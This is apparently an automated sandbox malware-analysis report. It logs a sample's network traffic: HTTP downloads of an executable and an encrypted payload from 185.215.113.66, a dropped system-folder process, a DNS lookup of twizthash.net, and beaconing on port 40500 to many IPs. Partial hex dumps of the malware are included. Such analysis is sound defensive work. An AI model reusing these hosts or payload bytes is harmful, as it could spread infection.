                                                                                                                                                                                            Oct 26, 2024 07:28:20.853806019 CEST5002240500192.168.2.65.237.148.223
                                                                                                                                                                                            Oct 26, 2024 07:28:22.344497919 CEST5002640500192.168.2.689.218.239.82
                                                                                                                                                                                            Oct 26, 2024 07:28:22.349926949 CEST405005002689.218.239.82192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:22.350003958 CEST5002640500192.168.2.689.218.239.82
                                                                                                                                                                                            Oct 26, 2024 07:28:22.351888895 CEST5002640500192.168.2.689.218.239.82
                                                                                                                                                                                            Oct 26, 2024 07:28:22.357206106 CEST405005002689.218.239.82192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:22.358297110 CEST5002640500192.168.2.689.218.239.82
                                                                                                                                                                                            Oct 26, 2024 07:28:22.363743067 CEST405005002689.218.239.82192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:22.378230095 CEST5002640500192.168.2.689.218.239.82
                                                                                                                                                                                            Oct 26, 2024 07:28:22.396002054 CEST5001680192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:22.396295071 CEST5002780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:22.401588917 CEST805002791.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:22.401668072 CEST5002780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:22.401784897 CEST805001691.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:22.401848078 CEST5001680192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:22.408170938 CEST5002780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:22.413538933 CEST805002791.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:22.431446075 CEST405005002689.218.239.82192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:23.377285004 CEST805002791.202.233.141192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:23.377368927 CEST5002780192.168.2.691.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:28:24.489023924 CEST515250008185.215.113.66192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:24.593633890 CEST500085152192.168.2.6185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:28:25.803725004 CEST405005002437.151.113.156192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:25.805289030 CEST5002440500192.168.2.637.151.113.156
                                                                                                                                                                                            Oct 26, 2024 07:28:30.827493906 CEST405005002689.218.239.82192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:28:30.827867985 CEST5002640500192.168.2.689.218.239.82
                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Oct 26, 2024 07:26:38.418675900 CEST5841540500192.168.2.685.173.115.180
                                                                                                                                                                                            Oct 26, 2024 07:26:43.408273935 CEST5841540500192.168.2.690.156.163.121
                                                                                                                                                                                            Oct 26, 2024 07:26:48.423352957 CEST5841540500192.168.2.662.209.135.143
                                                                                                                                                                                            Oct 26, 2024 07:26:53.488631964 CEST5841540500192.168.2.6213.230.97.241
                                                                                                                                                                                            Oct 26, 2024 07:26:58.485910892 CEST5841540500192.168.2.693.188.83.238
                                                                                                                                                                                            Oct 26, 2024 07:27:03.501939058 CEST5841540500192.168.2.695.58.216.162
                                                                                                                                                                                            Oct 26, 2024 07:27:08.517327070 CEST5841540500192.168.2.680.191.218.209
                                                                                                                                                                                            Oct 26, 2024 07:27:13.518976927 CEST5841540500192.168.2.685.233.153.109
                                                                                                                                                                                            Oct 26, 2024 07:27:18.542857885 CEST5841540500192.168.2.6188.212.80.105
                                                                                                                                                                                            Oct 26, 2024 07:27:23.623497963 CEST5841540500192.168.2.690.156.160.66
                                                                                                                                                                                            Oct 26, 2024 07:27:28.611115932 CEST5841540500192.168.2.688.204.242.226
                                                                                                                                                                                            Oct 26, 2024 07:27:33.626704931 CEST5841540500192.168.2.62.181.31.167
                                                                                                                                                                                            Oct 26, 2024 07:27:38.791275978 CEST5841540500192.168.2.677.240.41.3
                                                                                                                                                                                            Oct 26, 2024 07:27:43.783471107 CEST5841540500192.168.2.6151.243.242.97
                                                                                                                                                                                            Oct 26, 2024 07:27:46.859021902 CEST6152153192.168.2.61.1.1.1
                                                                                                                                                                                            Oct 26, 2024 07:27:46.869105101 CEST53615211.1.1.1192.168.2.6
                                                                                                                                                                                            Oct 26, 2024 07:27:48.799926996 CEST5841540500192.168.2.6178.91.91.225
                                                                                                                                                                                            Oct 26, 2024 07:27:53.827913046 CEST5841540500192.168.2.691.246.92.22
                                                                                                                                                                                            Oct 26, 2024 07:27:58.869481087 CEST5841540500192.168.2.678.39.234.9
                                                                                                                                                                                            Oct 26, 2024 07:28:03.901884079 CEST5841540500192.168.2.6197.165.192.61
                                                                                                                                                                                            Oct 26, 2024 07:28:08.907762051 CEST5841540500192.168.2.690.156.163.55
                                                                                                                                                                                            Oct 26, 2024 07:28:13.935565948 CEST5841540500192.168.2.694.158.52.97
                                                                                                                                                                                            Oct 26, 2024 07:28:18.924523115 CEST5841540500192.168.2.646.100.164.239
                                                                                                                                                                                            Oct 26, 2024 07:28:23.940145016 CEST5841540500192.168.2.6213.206.45.227
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                            Oct 26, 2024 07:27:46.859021902 CEST192.168.2.61.1.1.10xd1bdStandard query (0)twizthash.netA (IP address)IN (0x0001)false
                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                            Oct 26, 2024 07:26:15.573611021 CEST1.1.1.1192.168.2.60x3e00No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                            Oct 26, 2024 07:26:15.573611021 CEST1.1.1.1192.168.2.60x3e00No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                            Oct 26, 2024 07:27:46.869105101 CEST1.1.1.1192.168.2.60xd1bdNo error (0)twizthash.net185.215.113.66A (IP address)IN (0x0001)false
                                                                                                                                                                                            • 185.215.113.66
                                                                                                                                                                                            • 185.215.113.84
                                                                                                                                                                                            • 91.202.233.141
                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            0192.168.2.649763185.215.113.66805348C:\Users\user\Desktop\Us051y7j25.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:26:25.910675049 CEST282OUTGET /tdrpl.exe HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Oct 26, 2024 07:26:26.830950975 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:26:26 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 85504
                                                                                                                                                                                            Last-Modified: Sun, 20 Oct 2024 18:13:32 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6715484c-14e00"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PELgp@y@p|0.text `.rdata?@@@.data.@2@
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831015110 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66
                                                                                                                                                                                            Data Ascii: Ul$E V3W|$ tO9ufPf;Wt@uu"j GfOfNU Vu L$|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWU
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831069946 CEST1236INData Raw: 00 8b f0 6a 01 6a 00 c7 06 70 64 75 00 c7 46 04 00 00 00 00 ff 15 98 00 41 00 6a 11 6a 02 6a 02 89 46 10 ff 15 34 02 41 00 89 46 08 83 f8 ff 75 0b 56 e8 5b fe ff ff 83 c4 04 33 f6 85 f6 0f 84 90 00 00 00 33 c0 89 44 24 0e 89 44 24 12 89 44 24 16
                                                                                                                                                                                            Data Ascii: jjpduFAjjjF4AFuV[33D$D$D$fD$D$ WD$fL$0AjT$(RjfD$D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;Fv
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831103086 CEST636INData Raw: 24 51 52 50 ff 15 54 02 41 00 f6 44 24 24 08 74 6d 83 7c 24 34 00 75 66 81 3b 50 43 4f 49 75 5e 8b 43 14 8d 4c 24 10 51 8d 54 24 18 52 50 c7 44 24 1c 10 00 00 00 ff 15 68 02 41 00 83 f8 ff 74 3d 50 8b c3 e8 05 09 00 00 8b f0 83 c4 04 85 f6 74 2c
                                                                                                                                                                                            Data Ascii: $QRPTAD$$tm|$4uf;PCOIu^CL$QT$RPD$hAt=Pt,dQS3ktu>ilciu=4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVR
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831139088 CEST1236INData Raw: e8 ed fe ff ff 8a d8 83 c4 04 84 db 74 37 8d af 44 02 00 00 55 ff 15 f4 00 41 00 8b 87 5c 02 00 00 85 c0 74 0c 89 46 38 8b 97 5c 02 00 00 89 72 34 55 89 b7 5c 02 00 00 ff 15 f8 00 41 00 5e 5d 5f 8a c3 5b c3 8b 46 2c 50 e8 24 8f 00 00 56 e8 1e 8f
                                                                                                                                                                                            Data Ascii: t7DUA\tF8\r4U\A^]_[F,P$V^]_[`S`AUW3PD$D$WD$PL$Qj$URtDXA=t5=3'u7j8A`3PWD$D$D$PL$QjURu_][_]2[
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831171989 CEST1236INData Raw: 0b 51 6a 04 68 ff ff 00 00 50 c6 44 24 1b 01 ff 15 18 02 41 00 8b 4c 24 44 33 c0 89 44 24 0a 89 44 24 0e 89 44 24 12 66 89 44 24 16 8b 44 24 40 ba 02 00 00 00 51 66 89 54 24 0c 89 44 24 10 ff 15 30 02 41 00 6a 10 8d 54 24 0c 66 89 44 24 0e 8b 46
                                                                                                                                                                                            Data Ascii: QjhPD$AL$D3D$D$D$fD$D$@QfT$D$0AjT$fD$FRPAyNhQ@AteHAFtXVjPRPAtFW39~vFjjVhP@jPjG;~rNjjVh @jQL_^8V[3^8L$3
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831206083 CEST1236INData Raw: 0c 0f 83 89 00 00 00 8b 4d 08 8b 51 08 89 55 f4 8b 45 0c c1 e0 02 50 e8 9e 83 00 00 83 c4 04 89 45 f0 8b 4d 08 8b 11 89 55 f8 83 7d f0 00 75 1c 8b 45 f4 50 8b 4d f8 51 e8 9d 11 00 00 83 c4 08 8b 55 f8 52 e8 81 85 00 00 83 c4 04 8b 45 f4 c1 e0 02
                                                                                                                                                                                            Data Ascii: MQUEPEMU}uEPMQUREPMQUREPMQjURNEMUEBMQUEEM;MsUM3]UEHQUP8EMM
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831234932 CEST236INData Raw: 00 00 00 8b 4d f0 89 4d ec 8b 55 e0 89 55 d4 8b 45 d4 33 d2 f7 75 f4 89 45 f0 8b 45 f0 0f af 45 f4 8b 4d d4 2b c8 89 4d e8 8b 55 e8 c1 e2 10 0b 55 d0 89 55 d4 81 7d f0 00 00 01 00 74 0c 8b 45 f0 0f af 45 d8 3b 45 d4 76 3c 8b 4d f0 83 e9 01 89 4d
                                                                                                                                                                                            Data Ascii: MMUUE3uEEEM+MUUU}tEE;Ev<MMUUUEEE}sMM;MvUUE%EMMMUREPMQUR;E%tMMUUUEEM
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831267118 CEST1236INData Raw: 08 89 01 8b 55 e0 89 55 d4 8b 45 d4 33 d2 f7 75 f4 89 45 f0 8b 45 f0 0f af 45 f4 8b 4d d4 2b c8 89 4d e8 8b 55 e8 c1 e2 10 0b 55 f8 89 55 d4 81 7d f0 00 00 01 00 74 0c 8b 45 f0 0f af 45 d8 3b 45 d4 76 3c 8b 4d f0 83 e9 01 89 4d f0 8b 55 e8 03 55
                                                                                                                                                                                            Data Ascii: UUE3uEEEM+MUUU}tEE;Ev<MMUUUEEE}sMM;MvUUE%EMMMUREPMQURUE%tMMUUUEE%MUE
                                                                                                                                                                                            Oct 26, 2024 07:26:26.831304073 CEST1236INData Raw: 52 8b 45 c8 50 8b 4d 10 51 8b 55 0c 52 e8 b4 07 00 00 83 c4 10 89 45 f8 8b 45 0c 89 45 e4 8b 4d f8 89 4d dc 8b 55 cc 89 55 d0 eb 09 8b 45 d0 83 e8 01 89 45 d0 83 7d d0 00 0f 8c a3 01 00 00 c7 45 e8 00 00 00 00 8b 4d dc 89 4d e0 8b 55 d0 03 55 fc
                                                                                                                                                                                            Data Ascii: REPMQUREEEMMUUEE}EMMUUELMUELQUREPMQE}t=EUUELMUEMLMUEM;LsE}}UUELQUELQUR
                                                                                                                                                                                            Oct 26, 2024 07:26:26.836692095 CEST1236INData Raw: 4d d8 8b 55 fc 81 e2 00 00 00 80 f7 da 1b d2 f7 da 89 55 e0 8b 45 f8 d1 e0 89 45 f8 8b 4d fc d1 e1 89 4d fc 8b 55 fc 0b 55 d8 89 55 fc 8b 45 f8 03 45 e8 89 45 f8 8b 4d f8 3b 4d e8 73 14 8b 55 fc 83 c2 01 89 55 fc 75 09 8b 45 e0 83 c0 01 89 45 e0
                                                                                                                                                                                            Data Ascii: MUUEEMMUUUEEEM;MsUUuEEMMMU;UsEEMMUEEMMUE;sMMuUUEE;Eu'}t!MMMU;UsEEEMMUEMMUU


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            1192.168.2.649814185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:26:35.922713995 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:26:36.855973959 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:26:36 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 110600
                                                                                                                                                                                            Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f3a94a-1b008"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                                                            Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                                                            Oct 26, 2024 07:26:36.855986118 CEST1236INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                            Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
                                                                                                                                                                                            Oct 26, 2024 07:26:36.855998993 CEST224INData Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
                                                                                                                                                                                            Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a
                                                                                                                                                                                            Oct 26, 2024 07:26:36.856136084 CEST1236INData Raw: 24 1a 40 15 ef 62 57 45 85 0a 95 13 1c 99 a6 67 55 34 b3 4c e3 6c c9 df 4c b8 f9 00 9a a1 41 71 99 93 d4 bc b8 1e a9 35 3b 7a a6 23 40 95 fb d1 4d 91 a1 81 38 02 69 ff 64 38 a9 5b 0c b3 79 81 37 2a d8 94 b2 70 12 b6 ca 8b f9 d0 13 b1 08 e6 b5 1a
                                                                                                                                                                                            Data Ascii: $@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[Z88Al5r6^9Cko+@bk$>@|#}_XkeTl~Kyyx.d;XbbE7PF-Pedz}F M1
                                                                                                                                                                                            Oct 26, 2024 07:26:36.856151104 CEST1236INData Raw: c7 90 a6 02 38 63 65 e1 35 a7 5c 4a fc a5 a0 41 7c fa ab ec 4d 5a 7a a8 cd f3 9d 2c c0 4a b6 e1 08 2d bf 09 5a 6f 0c 55 f3 a1 ca 08 53 b9 2d 96 2c f5 54 d0 f6 e9 c7 e4 16 91 cf 60 d5 69 da 3f 60 78 a9 71 63 5b 82 90 94 ff 29 32 7e 70 86 b4 8a 0d
                                                                                                                                                                                            Data Ascii: 8ce5\JA|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA E8xY8hLJPi|Kl3KK?OnV& KyL1d6Y0m~ ?LOR9.0Ddr(d
                                                                                                                                                                                            Oct 26, 2024 07:26:36.856158972 CEST1236INData Raw: 28 61 e2 66 9b ed fc 10 0b a8 19 72 63 40 c3 28 e9 51 10 17 b4 30 ee 42 af 06 1c 4a 85 b0 2a ec 47 0f 32 d2 86 d0 1c d3 5e 7b b7 1f 33 07 6b 7b 24 d5 3f 84 69 dd 1a c6 6d 55 ff 95 4d 1d 72 62 64 03 d5 d6 f5 c7 3c 82 9b 0f 82 f1 35 c3 a4 38 ed de
                                                                                                                                                                                            Data Ascii: (afrc@(Q0BJ*G2^{3k{$?imUMrbd<58qqH!]C'L l~FseDp?X76J^\=onk=\HmyYcEJI4B15't=ec*jt'48
                                                                                                                                                                                            Oct 26, 2024 07:26:36.856161118 CEST1236INData Raw: 06 39 50 b7 43 45 3d ac a2 e6 c3 59 fb 1b bf 14 aa fe 64 94 02 43 ff 0c 0f 1c 94 09 2f 2f 8a c0 37 fa 4d 6f 1b d7 c0 3a 5f 5b ed 6e e8 14 55 34 e5 ee f8 a6 e2 26 2d 14 2b 8a f2 54 ef 86 95 b6 07 f3 f1 c8 33 55 2c 25 e8 c8 07 cb 53 9a 8d 14 21 ed
                                                                                                                                                                                            Data Ascii: 9PCE=YdC//7Mo:_[nU4&-+T3U,%S!&C+?0p[}f*5&hj5[@Bq\h6s0s`W}j;Ko7:duXW=m: "iQ`jLrzg(,=-L<z g
                                                                                                                                                                                            Oct 26, 2024 07:26:36.856164932 CEST648INData Raw: 53 07 71 4d 23 9b d2 8d 26 40 9e 1a 5f 28 96 06 38 ba 40 ee df d5 99 8c 8d 30 3c 9b 11 58 9c 1e fc 9b 48 82 51 d7 75 3f 39 38 b9 8f 1f bf 6b 69 e2 b5 18 cb 72 fd f4 17 1c 26 5b 51 bc 83 ce 8a 4d 72 79 27 36 15 c3 59 c3 b5 a9 55 6b 8b 38 19 47 5b
                                                                                                                                                                                            Data Ascii: SqM#&@_(8@0<XHQu?98kir&[QMry'6YUk8G['kY.@?i3t&MkQ_DWc!=|Wx)ML<`injM's)+]t/Iu#(R<*n0g%hV`GT1"
                                                                                                                                                                                            Oct 26, 2024 07:26:36.856177092 CEST1236INData Raw: ab 02 4f b7 77 b8 d6 61 8c 11 cc 35 fe dd fa 9c b3 17 68 68 79 58 d6 91 26 cb cf cc ff bc 31 bd d3 10 2f e7 12 fb 76 06 2e ea b6 26 10 d4 f3 20 fe 37 f6 ff 94 8c ba 34 7d 80 44 10 e4 dc e2 fa 7e bc 22 bd 92 c3 af ae 7d d5 f4 d6 2d 54 ac a6 4e 03
                                                                                                                                                                                            Data Ascii: Owa5hhyX&1/v.& 74}D~"}-TN.`"=aUNoPpy@U$f^{q[BHQ:>:v<DmA[M=NHI"={`!a}j&C'Xe^X.t~>,lmhPA~FE
                                                                                                                                                                                            Oct 26, 2024 07:26:36.856189966 CEST1236INData Raw: ab 7d 9c ac c4 aa 17 1d 59 5a 32 3a b1 48 b2 25 c1 ba 3e 25 fb b4 69 81 ab bd 29 75 ad b7 45 ea 4c e5 76 80 3b fa ec 7c 6f 7c 12 70 36 2d 91 1c 84 79 29 65 62 2a 42 9f 21 88 a8 e5 70 d0 fd 3b 67 61 4f 29 89 ec 5b 34 2e 01 91 1a 92 89 57 ab 91 7b
                                                                                                                                                                                            Data Ascii: }YZ2:H%>%i)uELv;|o|p6-y)eb*B!p;gaO)[4.W{6R,+*Yq3QqTS7d$6n^ ouj~0XvA$Eq<B7\#!``g~{(>i]D5n6EVl;7VtOl[c
                                                                                                                                                                                            Oct 26, 2024 07:26:36.861507893 CEST1236INData Raw: b5 93 98 79 2e 09 cd 11 59 84 3d 04 a7 f1 c0 a4 3b 1e 22 b5 76 35 21 a8 3d ea 56 08 b8 ef 53 61 0d 1f 5d 2b 7f 33 16 8e 38 8e 34 bb 28 13 f4 8f c0 71 68 6b f4 63 25 63 92 07 2d e0 e6 37 fa 70 30 e3 b4 00 51 cb 2e 37 b8 23 41 8d e8 05 91 e7 fa 39
                                                                                                                                                                                            Data Ascii: y.Y=;"v5!=VSa]+384(qhkc%c-7p0Q.7#A9<U3NW4:0T]Gl_Ht&:UP}u|C_/S0'n!C??&ol@ &d'C(!S"EYDXW`IN6Z-C%"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            2192.168.2.649826185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:26:37.869573116 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:26:38.805803061 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:26:38 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 110600
                                                                                                                                                                                            Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f3a94a-1b008"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
